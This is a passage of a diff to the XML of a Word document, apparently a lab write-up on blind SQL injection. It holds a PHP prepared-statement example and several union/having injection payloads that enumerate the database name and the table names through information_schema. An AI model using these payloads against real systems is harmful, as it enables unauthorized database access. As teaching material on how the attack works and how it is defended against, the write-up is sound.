               <w:t>done</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -11430,43 +10976,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = $con-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>prepare(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11494,61 +11004,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>bind_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>param</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"s", $_GET["username"]);</w:t>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11576,43 +11032,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>execute(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;execute();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11640,43 +11060,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>close(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;close();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12052,27 +11436,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL --+</w:t>
+              <w:t>' union select NULL,NULL,NULL --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12210,27 +11574,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having</w:t>
+              <w:t>' union select NULL,NULL,NULL having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12273,27 +11617,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12311,21 +11635,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>) correctly.</w:t>
+              <w:t>In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of database() correctly.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12450,19 +11760,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>, which should be rare case</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> but if it happens, we will need to expand our charset</w:t>
+              <w:t xml:space="preserve">, which should be </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">a </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>rare case but if it happens, we will need to expand our charset</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12482,13 +11792,19 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>T</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>hen we have two options:</w:t>
+              <w:t>So</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> here </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>we have two options:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12525,13 +11841,43 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> use common sense here to tell whether we have got all the characters of what we are looking fo</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>r since the naming of the schema is likely to be human readable</w:t>
+              <w:t xml:space="preserve"> use </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">our </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>common sense to tell whether we have got all the characters of what we are looking fo</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">r since the naming of the schema is likely to be human </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>recognisable, e.g.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> combination of words</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12556,7 +11902,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">We assume that we have got the correct guess and continue our exploitation. If we cannot proceed further, </w:t>
+              <w:t xml:space="preserve">We assume that we have got the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>whole string</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and continue our exploitation. If we cannot proceed further, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12640,20 +11998,12 @@
               </w:rPr>
               <w:t xml:space="preserve">the value of </w:t>
             </w:r>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>),</w:t>
+              <w:t>database(),</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12726,107 +12076,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12852,127 +12102,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,9)=BINARY 'Trainings' and table_name&lt;&gt;'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12998,147 +12128,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,5)=BINARY 'Users' and table_name&lt;&gt;'testing' and table_name&lt;&gt;'Trainings' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13163,16 +12153,187 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>n a), we do the same thing as step 2 to get the first table name of “Secure” from information_schema.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
